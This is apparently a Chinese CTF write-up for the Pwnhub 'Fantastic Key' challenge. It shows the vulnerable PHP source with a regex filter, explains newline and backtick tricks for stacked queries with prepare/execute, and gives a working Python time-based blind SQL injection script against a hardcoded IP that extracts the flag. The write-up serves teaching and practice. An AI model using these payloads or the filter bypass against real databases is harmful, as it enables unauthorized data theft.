Pwnhub Fantastic Key

https://mp.weixin.qq.com/s?__biz=MzI2OTUzMzg3Ng==&mid=2247484074&idx=1&sn=2bcac1abf8364cc4040d2f3cb07e21d6&chksm=eadf9571dda81c678acffc2e79a4363d085e372428a14cb525e324c1e9e492a84d6d52b7d054&mpshare=1&scene=23&srcid=12167GnqMynTveY20gEIhScx&sharer_sharetime=1576496036398&sharer_shareid=ae6683d6c0e7df9a0b7c15e7cacf6b3c#rd
https://www.cnblogs.com/wfzWebSecuity/p/12049920.html

#index.php
<?php
error_reporting(0);
include 'config.php';
$id=$_POST['i']?waf($_POST['i']):rand(1,8);
$v=$_POST['v']?waf($_POST['v']):'anime';
$sql="desc `acg_{$v}`";
if (!$conn->query($sql)){
die('no such table');
}
$sql = "SELECT * FROM acg_{$v} where id = '$id'";
$result=$conn->query($sql);
if (!$result){
die('error');
}
foreach ($result as $row) {
print "<!-- $row[0] --> \t";
print "$row[1]<br><img src='img/$row[1].jpg' style='width:600px;'>
<br>";
}

#config.php
<?php
$con = "mysql:host=localhost;port=3306;dbname=acg";
$conn = new PDO($con, 'user', 'user');
$conn->query('set names utf8');
function waf($s)
{
if (preg_match("/select|union|or|and|\.|\\\\| |\)|\'|\"|in|\*|-|do|set|case|regexp|like|prepare.|.execute|\/|#|\\0/i",$s)!=false||strlen($s)>10000)
    die();
return $s;
}
?>

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>key</title>
</head>
<body>
<form action='index.php' method='POST'>
<select name='v'>
<option value ="anime">anime</option>
<option value ="character">character</option><br>
</select>
<input type='text' name='i' placeholder='id'>
<input type='submit' value='query'>
</form>
</body>
</html>

看到PDO，不难想到可以利用堆叠注入+预处理来进行注入绕过。

但是问题是，题目中过滤了set、prepare.、.execute，这就造成了很大的困扰。
首先prepare.和.execute应该是好绕的，因为如果是单纯的过滤，就不应该在正则中加.。

虽然正则表达式中.代表的是任意字符，但是并不包括换行符，换行符是([\s\S]*))

所以只需要prepare%0a和%0aexecute就可以绕过。同时空格被过滤也能通过%0a来进行绕过。

接下来先看看在哪里进行注入。题目中给出了两个值id和v都可以插入到sql语句中，但是问题是id所在的语句是加了引号的，而引号是被过滤了的。所以我们看一下v所在的语句。

$sql="desc `acg_{$v}`";
$sql = "SELECT * FROM acg_{$v} where id = '$id'";

但是因为注释被过滤了，所以我们在上述第二个语句中无法将后面的where id='id'给注释掉，所以会产生语法错误。所以我们这里选择第一个语句。

trick1

我们发现在语句中通过反引号可以将原本报错的句子正常执行了

虽然反引号包起来的语句并不会影响原本语句的查询结果

但是它确实是执行了，这就够了。

trick2

这里回想到刚才的set过滤的问题还没有解决。其实mysql中除了用set来给变量赋值之外，还能用select来完成变量赋值。这里列举几个赋值的方法

  set @s='123';
  select '123' into @s;
  select @s:='123';
  do @s:='123';

可是select也被过滤了，这里我们就需要利用where来帮我们完成select的功能。如

这样我们就可以完成堆叠查询+预处理了。
payload如下：

import requests
import libnum

flag = ''
url = 'http://139.217.112.201/'
pos = 1

while True:
    for i in range(128):
        try:
            #sql = "select if(ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))=%d,sleep(4),1);" % (pos, i)
            #sql = "select if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='acg_fff5lll1ll@g'),%d,1))=%d,sleep(4),1);" % (pos, i)
            sql = "select if(ascii(substr((select flag from `acg_fff5lll1ll@g`),%d,1))=%d,sleep(4),1);" % (pos, i)
            data="v=anime`%0a`%0awhere%0a@zz:=0x"+sql.encode('hex')+";prepare%0ast%0afrom%0a@zz;%0aexecute%0ast;&i="
            re = requests.post(url=url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"},timeout=2)
        except Exception, e:
            flag += chr(i)
            print flag
            break
    print "oops!"
    pos+=1

码力太弱了。。post里没有加headers，结果应该是没将%0a编码，一直出不了答案。其实代码中不用%0a用\n一样的，但是问题是为什么还要加headers，难道是post都要加这个吗。。